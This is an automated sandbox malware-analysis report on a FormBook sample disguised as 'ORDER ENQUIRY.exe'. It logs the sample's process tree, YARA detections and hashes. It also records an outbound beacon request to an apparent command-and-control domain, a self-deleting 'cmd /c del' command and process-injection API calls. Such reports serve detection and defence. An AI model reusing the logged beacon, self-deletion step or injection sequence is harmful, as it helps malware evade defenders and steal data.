Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49724	151.101.0.119	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:08:04.913273096 CEST	176	OUT	GET /hy08/?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL4s8KZ+L&DVRXbd=tXIxBhEhlzJLR HTTP/1.1 Host: www.flywatchsecurity.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 1, 2024 10:08:05.381761074 CEST	793	IN	HTTP/1.1 301 Moved Permanently Connection: close Content-Length: 0 server: adobe content-type: text/html; charset=UTF-8 location: https://flywatchsecurity.com/hy08?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL4s8KZ+L&DVRXbd=tXIxBhEhlzJLR cache-control: s-maxage=31536000 x-trace-id: 923128a4-cd6c-40a1-ba24-e333ff1d4ae6 x-app-name: Pro2-Renderer x-xss-protection: 1; mode=block x-content-type-options: nosniff Accept-Ranges: bytes Age: 0 Date: Tue, 01 Oct 2024 08:08:05 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740033-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1727770085.308888,VS0,VE26 Vary: Accept-Language, Accept-Encoding,Fastly-SSL, X-Use-Renderer X-Last-60s-Hits: 1 Set-Cookie: pro2_renderer_flex=1; secure; httponly; max-age=86400

Target ID:	0
Start time:	04:05:04
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\ORDER ENQUIRY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ORDER ENQUIRY.exe"
Imagebase:	0xcd0000
File size:	695'808 bytes
MD5 hash:	754FA726BA767C17EBBCE69E967D40CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:05:05
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\ORDER ENQUIRY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ORDER ENQUIRY.exe"
Imagebase:	0xeb0000
File size:	695'808 bytes
MD5 hash:	754FA726BA767C17EBBCE69E967D40CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:05:05
Start date:	01/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.4564943648.00000000106AF000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	04:05:08
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\colorcpl.exe"
Imagebase:	0xe0000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	04:05:12
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\ORDER ENQUIRY.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:05:12
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	262
Total number of Limit Nodes:	13

Executed Functions

Function 015ED4A8 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015ED536
GetCurrentThread.KERNEL32 ref: 015ED573
GetCurrentProcess.KERNEL32 ref: 015ED5B0
GetCurrentThreadId.KERNEL32 ref: 015ED609

Memory Dump Source

Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 84a45ab569effaf2bc9a9a142ccb18701686e34704019d89a6e5f59a1db05f91
Instruction ID: 7347bf96d7f4840b4d5aabe93118b0f9f04510d46593ca484c01e2e48c5a83b2
Opcode Fuzzy Hash: 84a45ab569effaf2bc9a9a142ccb18701686e34704019d89a6e5f59a1db05f91
Instruction Fuzzy Hash: 765156B0D003098FDB18DFAAD548BAEBFF1FF49314F24845AE019A72A0D7349984CB65

Function 015ED4B8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015ED536
GetCurrentThread.KERNEL32 ref: 015ED573
GetCurrentProcess.KERNEL32 ref: 015ED5B0
GetCurrentThreadId.KERNEL32 ref: 015ED609

Memory Dump Source

Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: bd2d0597bcbf12463b0261a4d997fe6a7577bbb26e79526a6ef7c5976200f585
Instruction ID: 96024043d37e16f9d9c96dd7d3aece1f2eec99b2c31090ac4925aac7f772fe10
Opcode Fuzzy Hash: bd2d0597bcbf12463b0261a4d997fe6a7577bbb26e79526a6ef7c5976200f585
Instruction Fuzzy Hash: E15123B0D002098FDB18DFAAD548BAEBBF5FF49314F208459E509B7260D778A984CF65

Function 07733B8D Relevance: 1.8, APIs: 1, Instructions: 253
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07733DCE

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d5d886bb7611c5d5f9aeae44ffc3783e88fcec1c8ef237ea3aac37a914532836
Instruction ID: 1aecdfa70c6ca2313338ed50bf8b8609565d8c5d061f6ad6a8edce2cff3c1528
Opcode Fuzzy Hash: d5d886bb7611c5d5f9aeae44ffc3783e88fcec1c8ef237ea3aac37a914532836
Instruction Fuzzy Hash: 92A16BB1D0021ACFDB24CFA8C840BEDBBB2BF44314F1485A9D808A7281DB759985CF92

Function 07733B98 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07733DCE

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8b4c643b53ddc691471082203d8dc1e058d3bf30362e60741e9b451b8446327b
Instruction ID: b2a1f5bd7852d3194c437a6d6436a925cbd0cc0e6c631c1e6461978c71020e03
Opcode Fuzzy Hash: 8b4c643b53ddc691471082203d8dc1e058d3bf30362e60741e9b451b8446327b
Instruction Fuzzy Hash: F3915CB1D0031ACFDB24DFA8C840BDDBBB2BF44310F1485A9D818A7281DB759985CF92

Function 015EAE28 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015EB07E

Memory Dump Source

Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5ef451d411d7a4e118d1064369651b4cfe5e9cabff65546ff0c9858591a7eab3
Instruction ID: 36417aa8619fd781547421c11e1c430760800d781447d7918dd052965f3b4824
Opcode Fuzzy Hash: 5ef451d411d7a4e118d1064369651b4cfe5e9cabff65546ff0c9858591a7eab3
Instruction Fuzzy Hash: 487123B0A00B058FD728DF2AD45875ABBF1FF88304F008A2DD49ADBA54D775E949CB90

Function 015E590C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015E59C9

Memory Dump Source

Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c0b2d2f25837471e1ad2260a4b3b64b0f795c9b4cd973f36a62781977dc192ad
Instruction ID: b716f06ae8d820f5de11b1ff06975a1e7d2d86f7211e74a4acf3c042881912a8
Opcode Fuzzy Hash: c0b2d2f25837471e1ad2260a4b3b64b0f795c9b4cd973f36a62781977dc192ad
Instruction Fuzzy Hash: EB41E1B4C00719CFDB28DFA9C888ADDBBF5BF49304F20806AD418AB255DB756946CF90

Function 015E449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015E59C9

Memory Dump Source

Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 766ef11c9c3661d0478cabd22a85b6878962d2cab140502aa1ed42d30e7ebb5f
Instruction ID: 106f9b01f426fd93e6a5d5aa63d4af77e7189072d8089a90c2fbefae1236bc35
Opcode Fuzzy Hash: 766ef11c9c3661d0478cabd22a85b6878962d2cab140502aa1ed42d30e7ebb5f
Instruction Fuzzy Hash: 9541B2B4C0071DCBDB28DFA9C988A9DBBF5BF49304F20806AD418AB255DB755945CF90

Function 07733909 Relevance: 1.6, APIs: 1, Instructions: 77
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077339A0

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dbc6b0f21dd08f576b84771721b153dc2820823f3527cb561e090c31a9af8e7a
Instruction ID: 6051d66037fae3a895312c30bbfb6149ce39117041a371b379d690f71b638fe2
Opcode Fuzzy Hash: dbc6b0f21dd08f576b84771721b153dc2820823f3527cb561e090c31a9af8e7a
Instruction Fuzzy Hash: E33123B19002499FCB10CFAAC884BEEBFF5EF49314F10842AE958A7241C7799945CBA0

Function 07733910 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077339A0

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 715672a78e6b6f98b1fd468a25351d558a087655179e42d9bc9388cfcfa8150c
Instruction ID: afbbdcd03af671bacb38356a191207449bce5ffa21726fd9a05fb6bc4d6f5ed0
Opcode Fuzzy Hash: 715672a78e6b6f98b1fd468a25351d558a087655179e42d9bc9388cfcfa8150c
Instruction Fuzzy Hash: 972127B5900309DFCB10DFAAC885BEEBBF5FF48314F108429E959A7241C7789944CBA0

Function 07733770 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077337F6

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4cd0b2447c839ecd30a2be355fe61cb1b1b8046abe61fca4e6959370c2d47cb2
Instruction ID: 25e4fa479d539938733968e77dd1e1cab7ed42de905d550e51d9fa4ee95c917b
Opcode Fuzzy Hash: 4cd0b2447c839ecd30a2be355fe61cb1b1b8046abe61fca4e6959370c2d47cb2
Instruction Fuzzy Hash: D52157B5D002099FDB10DFAAC4857EEBFF4EF49324F10842AD459AB241CB789945CFA1

Function 077339F8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07733A80

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 094d56849618190c5407b4ae9f43dee3fa09b45d06613a2b03898be3cb6991e1
Instruction ID: 916443acb4936855a8348ed51d0c7d0764b5e1be624ee9e145e315420ffb038a
Opcode Fuzzy Hash: 094d56849618190c5407b4ae9f43dee3fa09b45d06613a2b03898be3cb6991e1
Instruction Fuzzy Hash: 592125B1C002599FCB10DFAAC884AEEFBF5FF48320F10842AE559A7250D7799945CBA1

Function 015ED6FA Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED787

Memory Dump Source

Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9df93a413c0d7e42138d4794026b065fe929a4e8838ed435ce328d034a3a615f
Instruction ID: fc760d28b49760c3a6398e7a99e959415c5634c082d49502024d20786cc75c18
Opcode Fuzzy Hash: 9df93a413c0d7e42138d4794026b065fe929a4e8838ed435ce328d034a3a615f
Instruction Fuzzy Hash: E421E0B59002489FDB10CFAAD984AEEBFF5FB48310F14845AE918A7350C378A944CFA0

Function 07733778 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077337F6

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: bf1bc3eec8b9d41a386ff431121f3a57d2858cd5f2e2ac4e6303b121c5683231
Instruction ID: 6dd73454ab40d2f75d61902d96821d060ef9d913c8c01ef724832fc6b8bc9b74
Opcode Fuzzy Hash: bf1bc3eec8b9d41a386ff431121f3a57d2858cd5f2e2ac4e6303b121c5683231
Instruction Fuzzy Hash: 102135B5D002099FDB10DFAAC4857EEBBF4EF49310F10842AD419A7241CB78A945CFA1

Function 07733A00 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07733A80

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 087f90582dd996e3d05c3b292e912709d631af84d3e5612225e3928683bd431b
Instruction ID: 32b56d7e9c5405097070bea86d2736b08bb59734b2ad60d2f122d559cd13b630
Opcode Fuzzy Hash: 087f90582dd996e3d05c3b292e912709d631af84d3e5612225e3928683bd431b
Instruction Fuzzy Hash: 702137B1C003499FCB10DFAAC884AEEFBF5FF48310F10842AE519A7250C7389940CBA0

Function 015ED700 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED787

Memory Dump Source

Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0d1193519d61726430e3610bbbe64dc1f04e0fc4e2a7bfc30e8f0db5f47619f0
Instruction ID: f1b5bc57ef5438d593b38d64748fbdce082c82f88b390fbdc22f6375b6507495
Opcode Fuzzy Hash: 0d1193519d61726430e3610bbbe64dc1f04e0fc4e2a7bfc30e8f0db5f47619f0
Instruction Fuzzy Hash: B021B0B59002489FDB10CFAAD984ADEBBF9FB48310F14841AE918A7250D379A944CFA5

Function 07733849 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077338BE

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 775a006fdc4ca24e1e8f8054f1b4f3a7f667c974fa62eb2bb89caa4b4174cff3
Instruction ID: 76547be7d6410a7325d1f4feb1a2b90352e9adb6f9ab2582e5468cb5492e296d
Opcode Fuzzy Hash: 775a006fdc4ca24e1e8f8054f1b4f3a7f667c974fa62eb2bb89caa4b4174cff3
Instruction Fuzzy Hash: 192147B58002499FCB20DFAAC845BEEFFF5EF48324F148819E559A7250CB399584CBA1

Function 07733850 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077338BE

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 73a06385366762f616f36fba63508da0b5cece2e4453d78a0fa9ab958ad0af6d
Instruction ID: db41c06b1ce43a0557e9ad38605e3c8cc880015d3c58878092e8721e4090ccb5
Opcode Fuzzy Hash: 73a06385366762f616f36fba63508da0b5cece2e4453d78a0fa9ab958ad0af6d
Instruction Fuzzy Hash: 4E1107B59002499FCB20DFAAC845AEEFFF5EF48314F148829E519A7250CB79A544CFA1

Function 077362F8 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0773635D

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 51555e0ba8e9ba37a8f921a0d3faa11c66a5f0a320240accbc039a7cc66b0013
Instruction ID: a4e6304061d78c6f5c276f0dd689d17357989445d23776ea96793c0efdc56eff
Opcode Fuzzy Hash: 51555e0ba8e9ba37a8f921a0d3faa11c66a5f0a320240accbc039a7cc66b0013
Instruction Fuzzy Hash: A21125B58003889FDB10DF9AD589BDEFFF8EB49310F20885AD558A7241C379A544CFA5

Function 07733289 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 077332F2

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1350530bdecbd985672da207ae34bfc8e65360ed663753a59a7d5ab204e59e3f
Instruction ID: 199ea2b03b26be3a9920f238308801655501bbae2ad8ea3c665d83cded1c4764
Opcode Fuzzy Hash: 1350530bdecbd985672da207ae34bfc8e65360ed663753a59a7d5ab204e59e3f
Instruction Fuzzy Hash: 881146B5C002498FCB20DFAAC5457EEFBF4EF48310F24881AC459AB250CB38A545CFA1

Function 07733290 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 077332F2

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b3a7dacd5651f5840ab47a803761751ff70c4d6953f2fd608102870329655bc8
Instruction ID: 35e0fb8ff350dce895d069bec3e2e7344c186e917220be84d7df98e8137c7e67
Opcode Fuzzy Hash: b3a7dacd5651f5840ab47a803761751ff70c4d6953f2fd608102870329655bc8
Instruction Fuzzy Hash: FE1125B19002498FCB20DFAAC4457AEFBF5EF88324F208819D519A7240CB79A944CBA1

Function 07731CF0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0773635D

Memory Dump Source

Source File: 00000000.00000002.2100158275.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7730000_ORDER ENQUIRY.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7f8f186ec7f051677f92fafb2c81578d93cadaf1e541be1f85a1d1a46c7523da
Instruction ID: fe5e6410f1a28362a9054e2726499eb807de588a2e2f86f69d00bde16e6fcbab
Opcode Fuzzy Hash: 7f8f186ec7f051677f92fafb2c81578d93cadaf1e541be1f85a1d1a46c7523da
Instruction Fuzzy Hash: CF1103B5800349AFDB10DF9AC984BDEFBF8EB49310F10841AE558B7201C379A944CFA5

Function 015EB018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015EB07E

Memory Dump Source

Source File: 00000000.00000002.2097227902.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_ORDER ENQUIRY.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
